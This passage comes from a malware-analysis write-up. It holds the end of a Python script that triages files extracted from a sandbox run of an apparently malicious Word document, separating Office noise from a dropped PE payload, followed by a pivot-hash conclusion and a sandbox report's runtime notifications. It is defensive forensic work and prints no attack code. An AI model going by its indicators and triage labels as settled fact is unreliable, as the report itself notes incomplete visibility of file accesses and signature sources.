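    for pattern, label in OFFICE_NOISE:
        if pattern.search(name):
            return "noise:" + label
    if ftype == "peexe executable":
        # A PE written at runtime by a process other than the document viewer is the dropped payload.
        return "payload:pe" if not proc.startswith("WINWORD") else "payload:pe-from-winword"
    if name.lower() == "msforms.exd":
        return "artifact:forms-control-cache"   # written when an MSForms control is loaded by the VBA runtime
    if name.lower() == "index.dat":
        return "artifact:wininet-cache-index"   # the writing process used WinINet for its HTTP traffic
    if name.lower().endswith(".lnk"):
        return "artifact:recent-items-shortcut"  # Word's Recent Items shortcut to the opened document
    return "artifact:other"


def triage(records):
    """Group record names by their label."""
    groups = defaultdict(list)
    for name, _size, ftype, proc, _sha in records:
        groups[classify(name, ftype, proc)].append(name)
    return dict(groups)


def duplicate_hashes(records):
    """SHA-256 values that appear under more than one file name."""
    by_hash = defaultdict(list)
    for name, _size, _ftype, _proc, sha in records:
        by_hash[sha].append(name)
    return {sha: names for sha, names in by_hash.items() if len(names) > 1}


def pivot_hashes(records):
    """(sha256, writing process) for the dropped payload(s): the hashes to search for elsewhere."""
    return [(sha, proc) for name, _size, ftype, proc, sha in records
            if classify(name, ftype, proc).startswith("payload:")]


if __name__ == "__main__":
    for label, names in sorted(triage(EXTRACTED).items()):
        print(f"{label:32} {', '.join(names)}")
    print("duplicates:", duplicate_hashes(EXTRACTED))
    print("pivot on:", pivot_hashes(EXTRACTED))
```

The only pivot the list yields is BNEBB1.tmp (SHA-256 f1b55a19...) together with the process that wrote it, svchost.exe (PID 1588), which also wrote the WinINet index.dat; the four Office-generated files and the Recent Items shortcut carry no payload and should not be added to block lists.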
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all IP/URL string resources were checked online
- Not all file accesses are visible for cmd.exe (PID: 824)
- Not all file accesses are visible for explorer.exe (PID: 1664)
- Not all file accesses are visible for svchost.exe (PID: 1588)
- Not all file accesses are visible for svchost.exe (PID: 2412)
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "network-0" are available in the report
- Not all sources for signature ID "network-15" are available in the report
- Not all sources for signature ID "network-4" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all sources for signature ID "suricata-2" are available in the report